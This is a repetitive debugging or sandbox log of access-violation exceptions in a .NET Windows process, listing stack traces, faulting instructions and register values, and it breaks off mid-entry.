__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaaf9b61 0xaaf99c2 0xaaf9895 0xaaf814b 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480644 registers.edi: 37480944 registers.eax: 0 registers.ebp: 37480956 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 42620840 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaafa12c 0xaaf99c2 0xaaf9895 0xaaf814b 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480932 registers.edi: 37481276 registers.eax: 0 registers.ebp: 37480940 registers.edx: 0 registers.ebx: 37483908 registers.esi: 42620840 registers.ecx: 43870424	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaaf9b61 0xaaf99c2 0xaaf98ad 0xaaf814b 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480644 registers.edi: 37480944 registers.eax: 0 registers.ebp: 37480956 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 42620840 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaafa12c 0xaaf99c2 0xaaf98ad 0xaaf814b 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480932 registers.edi: 37481276 registers.eax: 0 registers.ebp: 37480940 registers.edx: 0 registers.ebx: 37483908 registers.esi: 42620840 registers.ecx: 41689612	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaaf9b61 0xaaf99c2 0xaaf98ad 0xaaf814b 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480644 registers.edi: 37480944 registers.eax: 0 registers.ebp: 37480956 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaafa12c 0xaaf99c2 0xaaf98ad 0xaaf814b 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480932 registers.edi: 37481276 registers.eax: 0 registers.ebp: 37480940 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 43119404	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe648 0xaafe499 0xaaf9895 0xaaf8434 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480620 registers.edi: 37480920 registers.eax: 0 registers.ebp: 37480932 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaafebde 0xaafe499 0xaaf9895 0xaaf8434 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480908 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37480916 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 44554276	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe648 0xaafe499 0xaaf98ad 0xaaf8434 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480620 registers.edi: 37480920 registers.eax: 0 registers.ebp: 37480932 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaafebde 0xaafe499 0xaaf98ad 0xaaf8434 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480908 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37480916 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 45903964	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe648 0xaafe499 0xaaf98ad 0xaaf8434 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480620 registers.edi: 37480920 registers.eax: 0 registers.ebp: 37480932 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaafebde 0xaafe499 0xaaf98ad 0xaaf8434 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480908 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37480916 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 47253652	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafef82 0xaafed91 0xaaf9895 0xaaf854c 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 b0 d4 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafa7a2 registers.esp: 37480672 registers.edi: 37480972 registers.eax: 0 registers.ebp: 37480984 registers.edx: 177853076 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 0	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafe0d0 0xaaff3ea 0xaafed91 0xaaf9895 0xaaf854c 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72d27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72d24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaafe113 registers.esp: 37480960 registers.edi: 37481300 registers.eax: 0 registers.ebp: 37480968 registers.edx: 0 registers.ebx: 37483908 registers.esi: 41452316 registers.ecx: 42105440	1
__exception__ July 10, 2023, 6:10 p.m.	stacktrace: 0xaafef82 0xaafed91 0xaaf98ad 0xaaf854c 0xaaf72e1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72602652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7261264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72612e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x726c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72751dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72751e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72751f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7275416a 